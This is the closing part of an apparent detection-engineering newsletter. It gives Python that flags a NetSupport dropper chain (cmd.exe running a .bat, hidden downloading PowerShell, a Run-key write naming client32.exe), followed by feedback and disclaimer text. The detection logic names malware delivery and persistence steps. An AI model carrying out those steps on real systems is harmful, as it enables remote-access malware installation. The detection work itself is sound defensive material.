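def bat_path(cmdline):
    """The .bat argument of a cmd.exe command line (quoted or bare), or None."""
    match = re.search(r'"([^"]+\.bat)"|(\S+\.bat)\b', cmdline, re.I)
    return (match.group(1) or match.group(2)) if match else None


def find_netsupport_dropper_chains(events):
    """cmd.exe <.bat> -> hidden downloading PowerShell -> Run-key write naming client32.exe."""
    procs = {e["pid"]: e for e in events if e["kind"] == "process"}
    children = defaultdict(list)
    for proc in procs.values():
        children[proc["ppid"]].append(proc["pid"])
    run_writes = [e for e in events if e["kind"] == "registry" and RUN_KEY.search(e["key"])]

    def descendants(pid):
        seen, stack = set(), [pid]
        while stack:
            for child in children[stack.pop()]:
                if child not in seen:
                    seen.add(child)
                    stack.append(child)
        return seen

    chains = []
    for cmd in procs.values():
        if cmd["image"].lower() != "cmd.exe" or not (bat := bat_path(cmd["cmdline"])):
            continue
        for ps_pid in children[cmd["pid"]]:
            ps = procs[ps_pid]
            if ps["image"].lower() not in ("powershell.exe", "pwsh.exe"):
                continue
            if not (HIDDEN_WINDOW.search(ps["cmdline"]) and DOWNLOADER.search(ps["cmdline"])):
                continue
            tree = descendants(ps_pid) | {ps_pid}
            for write in run_writes:
                if write["pid"] in tree and "client32.exe" in write["data"].lower():
                    chains.append({"bat": bat, "powershell_pid": ps_pid,
                                   "run_value": write["value"], "run_data": write["data"]})
    return chains


if __name__ == "__main__":
    for chain in find_netsupport_dropper_chains(EVENTS):
        print(chain)
```

Walking the PowerShell process's descendants rather than only the process itself is what keeps the detection intact when the Run-key write is delegated to reg.exe, as in the sample, or to a second PowerShell instance.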
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving this resource for the detection engineering community.
Disclaimer
The summaries in this brief are generated autonomously by the OpenAI LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We'd be happy to help — contact us.